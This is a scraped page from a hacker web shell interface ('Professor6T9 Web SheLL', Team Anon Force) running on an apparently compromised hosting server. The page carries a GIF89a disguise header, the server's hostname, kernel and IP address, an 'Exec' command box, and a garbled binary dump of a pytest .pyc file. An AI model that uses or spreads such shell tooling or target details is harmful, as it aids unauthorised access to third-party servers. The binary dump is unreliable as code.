GIF89;aGIF89;aGIF89;a
Team Anon Force
https://t.me/Professor6T9x
Professor6T9 Web SheLL
Linux premium264.web-hosting.com 4.18.0-553.45.1.lve.el8.x86_64 #1 SMP Wed Mar 26 12:08:09 UTC 2025 x86_64
LiteSpeed
69.57.162.12
/
opt
/
cloudlinux
/
venv
/
lib
/
python3.11
/
site-packages
/
_pytest
/
__pycache__
[ HOME ]
Exec
Submit
File Name : unraisableexception.cpython-311.pyc
� � hw � �x � d dl Z d dlZd dlZd dlmZ d dlmZ d dlmZ d dlmZ d dlm Z d dlm Z d dlZ G d� d � � Zd ed fd�Z ej d d �� � d ed fd�� � Z ej d d �� � d ed fd�� � Z ej d d �� � d ed fd�� � ZdS )� N)� TracebackType)�Any)�Callable)� Generator)�Optional)�Typec �r � e Zd ZdZd d�Zdd�Zdd�Zd eee d ee dee ddfd�ZdS )�catch_unraisable_exceptiona� Context manager catching unraisable exception using sys.unraisablehook. Storing the exception value (cm.unraisable.exc_value) creates a reference cycle. The reference cycle is broken explicitly when the context manager exits. Storing the object (cm.unraisable.object) can resurrect it if it is set to an object which is being finalized. Exiting the context manager clears the stored object. Usage: with catch_unraisable_exception() as cm: # code creating an "unraisable exception" ... # check the unraisable exception: use cm.unraisable ... # cm.unraisable attribute no longer exists at this point # (to break a reference cycle) �returnNc �"